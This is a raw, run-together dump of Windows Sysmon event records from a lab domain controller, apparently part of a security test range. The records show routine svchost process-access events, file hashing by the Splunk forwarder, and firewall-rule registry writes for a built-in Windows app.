12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.223{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.208{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF581AE5AF95A0FD2206834D445B370C,SHA256=89444E971E9F3E214300B03FA2CCCCED4BACCB69EF10D897F442054D17BAF00A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|M=microsoft.windows.apprep.chxapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CB9CE176-98CD-4440-81D8-C4D0F615C238}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C9E5C0E1-1061-4008-9F61-A97AAA58AE2C}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9DE9286B-B2D2-4A51-A145-A5F4AEAA234D}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.192{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{49066150-2377-4483-AAEA-8186EE3DA0B6}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 11241100x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.177 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.177{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0383D42653A83C967C07452DA019BE,SHA256=684B59E7B5AD71F04860C3BA1B25604956BF35B2411BCEDBAC32ED5C30C20972,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 